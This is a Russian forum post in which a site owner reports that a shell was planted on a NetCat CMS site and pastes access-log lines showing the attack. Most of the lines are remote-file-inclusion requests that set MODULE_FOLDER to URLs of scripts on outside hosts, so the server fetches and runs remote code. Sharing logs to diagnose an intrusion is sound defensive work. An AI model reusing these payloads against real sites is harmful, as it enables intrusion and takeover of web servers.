Лента этого топика

Обнаружен shell залитый в NetCet

(Ответов: 9, Просмотров: 1131)
  1. Значок / Очков: 5
    08.12.2011 05:09
    #1
    Elsone вне форума
    Elsone
    Вечно пьян о_О Аватар для Elsone
    • Регистрация: 12.04.2011
    • Сообщений: 794
    • Репутация: 298
    Ситуация такая, вышла критическое обновление для NetCet по безопасности. Установить его вовремя не успел.
    Нашел у себя в логах:

    Развернуть текст

    90.156.197.110 - - [03/Dec/2011:01:55:28 +0300] "GET /netcat/modules/auth/password_recovery.php//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=test?? HTTP/1.0" 200 5107 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:01:55:29 +0300] 200 "GET /netcat/modules/auth/password_recovery.php//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=test?? HTTP/1.1" 4502 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:01:55:30 +0300] "GET /netcat/modules/auth/password_recovery.php//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.0" 200 5132 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:01:55:30 +0300] 200 "GET /netcat/modules/auth/password_recovery.php//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.1" 4527 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:01:55:30 +0300] "GET /netcat/modules/auth/password_recovery.php//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 5139 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:01:55:30 +0300] 200 "GET /netcat/modules/auth/password_recovery.php//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 4534 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:01:55:32 +0300] "GET /netcat/modules/auth/password_recovery.php//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 5139 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:01:55:32 +0300] 200 "GET /netcat/modules/auth/password_recovery.php//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 4534 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:01:55:33 +0300] "GET //netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=test?? HTTP/1.0" 200 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:01:55:33 +0300] 200 "GET //netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=test?? HTTP/1.1" 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    0.156.197.110 - - [03/Dec/2011:01:55:34 +0300] "GET //netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.0" 200 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:01:55:34 +0300] 200 "GET //netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.1" 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:01:55:34 +0300] "GET //netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:01:55:34 +0300] 200 "GET //netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:01:55:35 +0300] "GET //netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:01:55:35 +0300] 200 "GET //netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:01:55:36 +0300] "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=test?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:01:55:36 +0300] 200 "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=test?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:01:55:38 +0300] "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:01:55:38 +0300] 200 "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:01:55:38 +0300] "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:01:55:38 +0300] 200 "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:01:55:39 +0300] "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:01:55:39 +0300] 200 "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:01:55:40 +0300] "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://58.141.76.253:8080/design07/a...dvdpagat.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:01:55:40 +0300] 200 "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://58.141.76.253:8080/design07/a...dvdpagat.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:01:55:40 +0300] "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:01:55:40 +0300] 200 "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://210.245.85.110:32000/link.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:01:55:42 +0300] "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:01:55:42 +0300] 200 "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://210.245.85.110:32000/link.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:13:35:21 +0300] "GET /netcat/modules/auth/password_recovery.php//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=test?? HTTP/1.0" 200 5102 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:13:35:21 +0300] 200 "GET /netcat/modules/auth/password_recovery.php//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=test?? HTTP/1.1" 4497 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:13:35:22 +0300] "GET /netcat/modules/auth/password_recovery.php//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.0" 200 5127 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:13:35:22 +0300] 200 "GET /netcat/modules/auth/password_recovery.php//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.1" 4522 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:13:35:23 +0300] "GET /netcat/modules/auth/password_recovery.php//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 5134 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:13:35:23 +0300] 200 "GET /netcat/modules/auth/password_recovery.php//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 4529 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:13:35:24 +0300] "GET /netcat/modules/auth/password_recovery.php//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 5134 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:13:35:24 +0300] 200 "GET /netcat/modules/auth/password_recovery.php//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 4529 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:13:35:25 +0300] "GET //netcat/modules/forum2/function.inc.php?MODULE_FOLDER=test?? HTTP/1.0" 200 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:13:35:25 +0300] 200 "GET //netcat/modules/forum2/function.inc.php?MODULE_FOLDER=test?? HTTP/1.1" 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:13:35:26 +0300] "GET //netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.0" 200 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:13:35:26 +0300] 200 "GET //netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.1" 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:13:35:26 +0300] "GET //netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:13:35:26 +0300] 200 "GET //netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:13:35:28 +0300] "GET //netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:13:35:28 +0300] 200 "GET //netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:13:35:29 +0300] "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=test?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:13:35:29 +0300] 200 "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=test?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:13:35:30 +0300] "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:13:35:30 +0300] 200 "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:13:35:30 +0300] "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:13:35:30 +0300] 200 "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:13:35:31 +0300] "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:13:35:31 +0300] 200 "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:13:35:32 +0300] "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://58.141.76.253:8080/design07/a...dvdpagat.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:13:35:33 +0300] 200 "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://58.141.76.253:8080/design07/a...dvdpagat.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:13:35:33 +0300] "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:13:35:33 +0300] 200 "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://210.245.85.110:32000/link.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:13:35:34 +0300] "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:13:35:34 +0300] 200 "GET /netcat/modules/auth//netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://58.141.76.253:8080/design07/admin/menu/dvdpagat.txt??http://210.245.85.110:32000/link.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:15:35:03 +0300] "GET /netcat/modules/auth/password_recovery.php//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=test?? HTTP/1.0" 200 5107 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:15:35:03 +0300] 200 "GET /netcat/modules/auth/password_recovery.php//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=test?? HTTP/1.1" 4502 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:15:35:05 +0300] "GET /netcat/modules/auth/password_recovery.php//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.0" 200 5132 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:15:35:05 +0300] 200 "GET /netcat/modules/auth/password_recovery.php//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.1" 4527 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:15:35:05 +0300] "GET /netcat/modules/auth/password_recovery.php//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 5139 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:15:35:05 +0300] 200 "GET /netcat/modules/auth/password_recovery.php//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 4534 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:15:35:06 +0300] "GET /netcat/modules/auth/password_recovery.php//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 5139 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:15:35:06 +0300] 200 "GET /netcat/modules/auth/password_recovery.php//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 4534 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:15:35:08 +0300] "GET //netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=test?? HTTP/1.0" 200 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:15:35:08 +0300] 200 "GET //netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=test?? HTTP/1.1" 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:15:35:09 +0300] "GET //netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.0" 200 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:15:35:09 +0300] 200 "GET //netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.1" 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:15:35:09 +0300] "GET //netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:15:35:09 +0300] 200 "GET //netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:15:35:10 +0300] "GET //netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.0" 200 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:15:35:10 +0300] 200 "GET //netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://210.245.85.110:32000/link.txt?? HTTP/1.1" 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:15:35:11 +0300] "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=test?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:15:35:11 +0300] 200 "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=test?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
    90.156.197.110 - - [03/Dec/2011:15:35:12 +0300] "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
    90.156.197.110 - - [03/Dec/2011:15:35:12 +0300] 200 "GET /netcat/modules/auth//netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://202.28.24.44/david.txt?? HTTP/1.1" 635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4" "-"
